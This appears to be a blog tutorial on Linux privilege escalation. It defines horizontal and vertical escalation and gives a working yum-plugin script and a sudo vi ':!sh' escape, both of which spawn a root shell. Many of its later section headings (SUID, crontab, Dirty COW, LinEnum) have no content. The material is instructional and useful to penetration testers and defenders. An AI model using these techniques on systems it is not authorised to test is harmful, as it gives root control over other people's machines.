Linux Privilege Escalation SUID bit

Linux Privilege Escalation

Linux privilege escalation can be very difficult to explore, here I will explain what linux privesc is and how you can do it manually or using tools to gather information about the system and suggest public exploits based on system Kernel version or misconfiguration.

What is Linux Privilege Escalation?

Privesc is the process of getting more access in the system then our current user.

If a low privilege user can read, write or execute a script with root permissions the user can use this to escalate privileges and get a root shell. Many times sysadmins left scripts or processes running into the system without a proper configuration with root access.

Types of Privilege Escalation

Horizontal privilege escalation

This is where you expand your reach over the compromised system by taking over a different user who is on the same privilege level as you. For instance, a normal user hijacking another normal user (rather than elevating to super user).

Vertical privilege escalation

This is where you attempt to gain higher privileges or access, with an existing account that you have already compromised.

For local privilege escalation attacks this might mean hijacking an account with administrator privileges or root privileges.

Exploiting Writeable /etc/passwd

Elevate privileges using yum

RFS=$(mktemp -d)
cat >$RFS/x<<EOF
[main]
plugins=1
pluginpath=$RFS
pluginconfpath=$RFS
EOF
cat >$RFS/y.conf<<EOF
[main]
enabled=1
EOF
cat >$RFS/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $RFS/x --enableplugin=y

Escaping VI Editor

sudo -l

sudo vi

:!sh

Suid privilege escalation

Systemctl privilege escalation

Crontab privilege escalation

Python privilege escalation linux

SSH privilege escalation

Privilege Escalation Exploits

Dirty cow exploit

Scripts

Using LinEnum